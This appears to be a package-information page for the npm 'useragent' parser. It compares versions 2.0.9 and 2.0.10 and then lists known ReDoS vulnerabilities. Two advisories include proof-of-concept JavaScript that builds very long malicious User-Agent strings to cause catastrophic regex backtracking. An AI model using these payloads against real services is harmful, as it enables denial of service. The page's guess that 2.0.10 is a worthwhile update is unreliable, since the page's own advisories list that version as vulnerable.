Useragent, a popular npm package for parsing user agent strings, saw a minor version bump from 2.0.9 to 2.0.10 in September 2014. Both versions share the same core functionality: providing accurate and efficient user agent parsing based on Browserscope's research. This makes it a valuable tool for developers needing to identify browsers, operating systems, and device types from user agent strings.
Looking at the metadata, the key difference lies in the release date, with version 2.0.10 being released approximately two and a half months after 2.0.9. While the core dependencies and development dependencies remain unchanged, this suggests that version 2.0.10 likely contains bug fixes, performance improvements, or refinements to the browser detection database. This minor but important update would make the library more robust and reliable. Developers should prioritize updating to the newest revision to benefit from these advancements since subtle changes in user agent patterns might be accurately parsed only with the latest updates.
For developers considering useragent, the consistent dependency list featuring tools like lru-cache, mocha, and should indicate continued support for caching and comprehensive testing. This helps ensure the package remains performant and of high quality. The MIT license ensures flexibility and ease of integration into various projects. Given the frequent changes in the browser landscape, staying updated with the latest versions is crucial for accurate results. Therefore, version 2.0.10 represents a worthwhile update to ensure optimal user agent parsing within your applications.
All the vulnerabilities related to the version 2.0.10 of the package
ReDoS via long UserAgent header in useragent
Affected versions of useragent are vulnerable to regular expression denial of service when an arbitrarily long User-Agent header is parsed.
var useragent = require('useragent');
var badUserAgent = 'MSIE 0.0'+Array(900000).join('0')+'XBLWP';
var request = 'GET / HTTP/1.1\r\nUser-Agent: ' + badUserAgent + '\r\n\r\n';
console.log(useragent.parse(request));
Update to version 2.1.13 or later.
useragent Regular Expression Denial of Service vulnerability
Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).
async function exploit() {
const useragent = require(\"useragent\");
// Create a malicious user-agent that leads to excessive backtracking
const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0';
// Parse the malicious user-agent
const agent = useragent.parse(maliciousUserAgent);
// Call the toString method to trigger the vulnerability
const result = await agent.device.toString();
console.log(result);
}
await exploit();